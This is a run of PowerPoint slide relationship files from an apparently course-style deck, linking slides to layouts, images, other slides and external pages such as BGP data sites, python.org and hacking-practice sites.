<file path=ppt/slides/_rels/slide146.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9.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9.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148.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9.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slide" Target="slide42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slide" Target="slide429.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image153.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide151.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8.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109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide152.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slide" Target="slide429.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9.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9.xml"/><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155.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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.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6.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide156.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9.xml"/><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hyperlink" Target="../Content/ItCS/Block/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide157.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slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.jpe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63.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide164.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165.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-61.html" TargetMode="Externa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6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170.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image169.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide168.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-55.html" TargetMode="Externa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6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173.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-61.html" TargetMode="Externa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7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slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image175.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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175.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-61.html" TargetMode="Externa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7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slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image178.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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178.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-56.html" TargetMode="Externa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79.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-59.html" TargetMode="Externa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8.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182.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image181.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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185.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide182.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image186.jpg"/><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183.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187.png"/><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189.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide184.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8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192.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide186.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193.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide188.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image198.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image203.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image208.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image197.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image202.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.jpeg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image206.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image201.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide189.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09.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19.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194.jpe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12.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide191.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image217.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.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213.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide192.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19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image218.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide193.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hyperlink" Target="../Content/ItCS/Os_Schedular/index.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide194.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95.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21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image220.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide196.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23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image222.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide197.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25.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image224.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide198.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09.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide199.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26.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide251.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slide" Target="slide47.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20.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9.jpeg"/><Relationship Id="rId7"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01.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227.png"/><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203.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9.jpeg"/><Relationship Id="rId7"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04.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28.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide205.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09.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide206.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29.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide207.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31.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image230.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide208.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33.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide81.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image232.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide209.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slide" Target="slide205.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide324.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide166.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide198.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide266.xml"/><Relationship Id="rId2"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slide" Target="slide187.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide183.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide177.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide82.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide210.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34.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide211.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35.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide212.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36.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-108.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide214.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37.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide215.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38.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image241.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide217.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42.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide218.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image247.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image246.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hyperlink" Target="https://bgp.he.net/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image245.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/BGPlay-master/run_bgplay.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image248.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide219.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hyperlink" Target="http://archive.routeviews.org/bgpdata/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bgp.he.net/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22.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50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image249.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide221.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52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image251.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide222.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54.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image253.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide223.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56.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image255.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide224.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58.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide225.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52.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide226.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60.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image259.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide227.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261.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62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide228.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63.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide229.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261.png"/><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23.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12.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230.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image268.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image267.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66.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image265.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image264.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide231.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71.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image270.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image269.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide232.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71.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image270.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image269.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide233.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275.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74.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide234.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275.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74.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide235.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275.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74.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide236.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76.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide237.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77.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide238.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78.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide239.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275.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74.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pwnable.kr/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ko.nacker.wikidok.net/" TargetMode="Externa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slide" Target="slide12.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webhacking.kr/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide240.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275.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74.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide241.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79.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide243.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81.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide244.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82.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide245.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283.jpeg"/><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246.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284.jpeg"/><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247.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87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image286.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image285.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide248.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89.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image288.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide249.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79.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide38.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide26.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3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4.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide29.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide45.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide28.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide40.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide250.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79.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide251.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide407.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide252.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide253.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide251.xm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slide" Target="slide381.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide322.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide253.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide266.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide295.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide264.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide289.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide254.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide318.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide262.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide282.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide259.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide312.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide275.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide257.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide270.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide305.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide254.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slide" Target="slide253.xml"/><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255.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56.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293.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image292.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide257.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58.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slide" Target="slide253.xml"/><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259.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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.python.org/downloads" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image295.png"/><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298.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image297.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image296.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide261.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301.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image300.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide262.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63.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image302.png"/><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05.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image304.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image303.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide264.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65.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308.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image307.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide266.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67.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image310.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image309.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide268.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image312.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image311.png"/></Relationships>
</file>

